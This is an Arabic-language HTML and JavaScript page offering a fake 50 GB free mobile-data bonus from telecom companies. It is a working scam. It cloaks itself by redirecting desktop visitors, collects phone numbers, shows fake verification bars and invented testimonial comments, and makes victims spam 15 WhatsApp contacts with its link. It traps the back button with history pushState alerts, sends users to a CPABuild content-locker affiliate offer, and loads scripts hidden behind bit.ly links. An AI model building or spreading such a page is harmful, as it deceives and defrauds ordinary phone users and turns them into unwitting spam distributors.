
<!DOCTYPE html>
<html>
    <head>
        <script>
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
            } else {
                window.location.href = "http://www.google.com";
            }
        </script>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>50  جيجا لكل مستعملي شبكات  الاتصال المحلية </title>
        <link rel="shortcut icon" type="image/png" href="https://i.imgur.com/VXlbdph.png" />
        <meta name="og:title" content="50 جيجا لكل مستعملي شبكات الاتصال المحلية  " />
        <meta name="og:url" content="https://recharge.com" />
        <meta property="og:description" content="اضغط هنا للحصول على الرصيد" />
        <meta property="og:image" content="https://i.imgur.com/VXlbdph.png" />
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#007dbc" />
        <link rel="stylesheet" href="https://bit.ly/3Nv1I9D" />
        <link rel="stylesheet" href="https://bit.ly/36vdIrb" />
        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.7/css/all.css">
<script src='https://kit.fontawesome.com/a076d05399.js' crossorigin='anonymous'></script>

<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2501530,"key":"c8363"};
</script>
<script src="https://d12u7tum9sda5e.cloudfront.net/27f1a30.js"></script>

    </head>
<body>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
    <div class="post">
        <img src="https://i.imgur.com/VXlbdph.png" />
        <div id="intro">
            <p class="welcome">
                قررت شركات الاتصال <span> </span>،
                منح رصيد مجاني بقيمة <span class="amount">50 جيجا</span> لجميع مستعملي الشبكات المحلية.
            </p>
            <button id="go" onclick="load()">اشحن الان</button>
        </div>
        <div id="loader">
            <div>المرجو الانتظار...</div>
            <div class="spin"></div>
            <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
            <div id="num"></div>
        </div>
        <div id="info" >
            <p class="title">قم بادخال رقم هاتفك :</p>
            <div class="phone">
                <input id="name" placeholder="ادخل رقمك هنا..." />
                <button id="confirm" onclick="checker()">التحقق</button>
            </div>
            <p class="error">المرجو ادخال الرقم يشكل صحيح !</p>
        </div>
        <div id="checking">
            <p class="title">جاري التحقق من الرقم...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-fa-check-circle"></i></span>
                    <span id="percentage">10%</span>
                </div>
            </div>
            <button id="go" onclick="shared()">استمرار</button>
        </div>
        <div id="share">
             <p class="tip">
                بعد التحقق، تبين أنك مؤهل للحصول على الرصيد و انه ليست هناك ادخالات سابقة ستتوصل برصيد <span class="amount">50 جيجا</span>  <span id="getname"></span> بعد اتمام الخطوات .
            </p>


            <p class="tip">1 -إضغط على زر "دعوة" الموجود فى الأسفل وارسل الرسالة الى 15 صديقا او 5 مجموعات على واتساب، ليستطيعو بدورهم الاستفادة من الرصيد المجاني .</p>
            <p class="tip">2 - ستتوصل بالرصيد مباشرة بعد امتلاء شريط التحقق الأخضر.</p>
            <button id="whatsapp" onclick="incNumber()">دعوة
</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle" aria-hidden="true"></i></p>
            <p class="title">يمكنك الآن التوصل بالرصيد الخاص بك</p>
            <button id="offer" onclick="CPABuildLock()">اضغط هنا للتوصل بالرصيد</button>
        </div>
        <div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://i.imgur.com/g6cV61A.png" /> <img class="love" src="https://i.imgur.com/0UHB1f0.png" /> <img class="care" src="https://i.imgur.com/sSMYbTT.png" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="far fa-comment"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRFvlIbliL3yuFXalr6YRTbCRWJ4ZIjVe15kdGJA0SgP7oRqy_miZXoXpjQ&s=10" />
                    <div class="single-container">
                        <span class="user">abde elamine</span>
                        <span class="text">

شكرا جزيلا لم اكن اومن بهاده الاشياء اقسم بالله لازلت لم اصدق وقد تفاجئت عندما وصلتني باقت  
                            50 جيجا                            شكرا على المصداقية
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://i.imgur.com/7N4n3lP.jpg" />
                    <div class="single-container"><span class="user">خديجة الاصمعي</span> <span class="text">لمذا لا يصل الرصيد صديقتي جربت وتوصلت بالرصيد لاكني انتظر مند نصف ساعة ولم اتوصل بشيى ؟</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://i.imgur.com/1FHFiyR.jpg" />
                    <div class="single-container"><span class="user">yassine Mahmoud</span> <span class="text">اختي فقط تحلي ببعض الصبر الموقع عليه ضغط كبير انا انتظرت لاكثر من ساعتين و في النهاية توصلت بالباقة </span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://i.imgur.com/0xgL338.jpg" />
                    <div class="single-container"><span class="user">Princess Safae</span> <span class="text">❤️ بعدما تأكدت ان الرصيد وصل رجعت لاشكركم على المصداقية</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
        <script type="text/javascript">
          var loader = document.getElementById("loader");
var intro = document.getElementById("intro");
var info = document.getElementById("info");
var checking = document.getElementById("checking");
var sharee = document.getElementById("share");
var claim = document.getElementById("claim");
function load() {
loader.style.display="block";
intro.style.display="none";

setTimeout (function(){
info.style.display="block";
loader.style.display="none";
},7000)

}

function checker() {
checking.style.display="block";
info.style.display="none";
move();
}

function shared() {
  sharee.style.display="block";
checking.style.display="none";
}
function invest(){
  claim.style.display="block";
  share.style.display="none";
}

function back() {
setTimeout ( () => {
intro.style.display="block";

loader.style.display="none";},2)
}

function start() {
  var duration = 10000; // it should finish in 5 seconds !
  $("#num").stop().css("center", 0).animate({
    center: 100
  }, {
    duration: duration,
    progress: function(promise, progress, ms) {
      $(this).text(Math.round(progress * 100) + '%');
    }
  });
}

start()
var i = 0;
function move() {
  if (i == 0) {
    i = 1;
    var elem = document.getElementById("fill");
    var elemm = document.getElementById("percentage");
    var width = 0;
    var id = setInterval(frame, 50);
    function frame() {
      if (width >= 100) {
        clearInterval(id);
        i = 0;
      } else {
        width++;
        elem.style.width = width + "%";


        elemm.innerHTML = width + "%";
      }
    }
  }
}
var i = 0;
var elem = document.getElementById("fill2");
    var elemm = document.getElementById("percentage2");
    var width = 0;

    function incNumber() {
        if (width < 100) {
          
        window.open(shareurl,'newwindow');
        width=width+20;
        setTimeout( function(){
        elem.style.width = width + "%";

        elemm.innerHTML = width + "%";},7000);
        
        } else if (width == 100) {
            invest();
        }

    }
    


        </script>
    </div>
    <script src="https://bit.ly/3Ntupnv"></script>
    <script type="text/javascript">
        !(function () {
            var psy;
            try {
                for (psy = 0; 10 > psy; ++psy) history.pushState({}, "", "");
                onpopstate = function (psy) {
                    psy.state && alert("لقد تم تسجيلك في قائمة المستفيدين المرجو اكمال الخطوات، تبقى لك خطوة واحدة!");
                };
            } catch (o) {}
        })();
    </script>
    <script src="js/fb.php"></script>
    <script src="js/main.php"></script>
    <script>
        var text1 = "شبكات الاتصال ",
            text2 = " تمنح باقت ",
            text3 = " بمناسبة شهر رمظان المبارك قم بالدخول و الاستفادة من الباقة المجانية الان قبل انتهاء العرض و احرص على التسجيل بالشكل الصحيح 👈 https://d3m.live/?recharge=4896410",
            error = "هناك خطأ!\nالمشاركات غير محسوبة ربما شاركته مع نفس الصديق او المجموعة اكثر من مرة، من فضلك اعد المشاركة.",
            cpa = "https://qoaaa.com/e4a33d14a1/bd19915205/?placementName=default",
            saved = "baba",
            shareurl = "whatsapp://send?text=" + text1 + "*  *" + text2 + "*50 جيجا*" + text3;
    </script>
    <script src="js/wp.php"></script>
  
  
  <a style="display: none">
<script id="_waury7">var _wau = _wau || []; _wau.push(["dynamic", "dayski1", "ry7", "c4302bffffff", "small"]);</script><script async src="https://bit.ly/3Dnychf"></script>

</a>



</body></html>




